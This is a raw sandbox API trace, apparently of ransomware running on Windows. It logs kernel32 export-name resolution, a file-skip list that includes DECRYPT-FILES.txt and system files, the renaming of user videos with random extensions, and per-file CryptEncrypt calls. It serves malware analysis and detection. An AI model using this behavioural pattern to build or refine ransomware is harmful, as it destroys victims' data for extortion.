[0087.085] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.085] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.085] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.085] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.085] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.085] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.085] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.085] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.085] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.085] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.085] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.085] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.085] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.085] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.085] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.085] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.085] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.086] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.086] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.086] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.086] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.086] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.086] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.086] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.086] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.086] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.086] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.086] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.086] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.086] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.086] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.086] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.086] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.087] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv") returned 55 [0087.087] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv.2CTtSFT") returned 63 [0087.087] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\32wz-id2idoohz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv.2CTtSFT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\32wz-id2idoohz.flv.2cttsft"), dwFlags=0x0) returned 1 [0087.087] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.088] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.088] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.088] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebd22680, ftCreationTime.dwHighDateTime=0x1d4d07b, ftLastAccessTime.dwLowDateTime=0x35064c60, ftLastAccessTime.dwHighDateTime=0x1d4cba3, ftLastWriteTime.dwLowDateTime=0x35064c60, ftLastWriteTime.dwHighDateTime=0x1d4cba3, nFileSizeHigh=0x0, nFileSizeLow=0x96bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XdinFYWI5XC.mkv", cAlternateFileName="8XDINF~1.MKV")) returned 1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="DECRYPT-FILES.txt") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="autorun.inf") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="boot.ini") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="desktop.ini") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="ntuser.dat") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="iconcache.db") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="bootsect.bak") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="ntuser.dat.log") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="thumbs.db") returned -1 [0087.088] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv", lpString2="Bootfont.bin") returned -1 [0087.088] lstrlenW (lpString="8XdinFYWI5XC.mkv") returned 16 [0087.088] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0087.088] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0087.088] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0087.088] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0087.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.089] lstrlenW (lpString="8XdinFYWI5XC.mkv") returned 16 [0087.089] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="8XdinFYWI5XC.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv" [0087.089] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8xdinfywi5xc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.089] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=38589) returned 1 [0087.089] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.089] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.089] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.089] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.089] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.090] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.090] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.091] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.091] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.096] CloseHandle (hObject=0x414) returned 1 [0087.096] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.096] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.097] CloseHandle (hObject=0x0) returned 0 [0087.097] CloseHandle (hObject=0x410) returned 1 [0087.097] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.097] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.097] GetTickCount () returned 0x114e38c [0087.097] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.098] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.098] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.098] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.098] lstrlenA (lpString="kernel32.dll") returned 12 [0087.098] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.098] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.098] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.098] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.098] lstrlenA (lpString="ADDATOMA") returned 8 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.099] lstrlenA (lpString="ADDATOMW") returned 8 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.099] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.099] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.099] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.099] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.099] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.099] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.099] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.099] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.099] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.099] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.099] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.099] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.099] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.099] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.099] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.099] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.099] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.100] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.100] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.100] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.100] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.100] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.100] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.100] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.100] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.100] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.100] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.100] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.100] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.100] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.100] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.100] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.100] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.100] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.100] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.101] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.101] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.101] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.101] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.101] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.101] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.101] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.101] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.101] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.101] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.101] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.101] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.101] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.101] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.101] lstrlenA (lpString="BEEP") returned 4 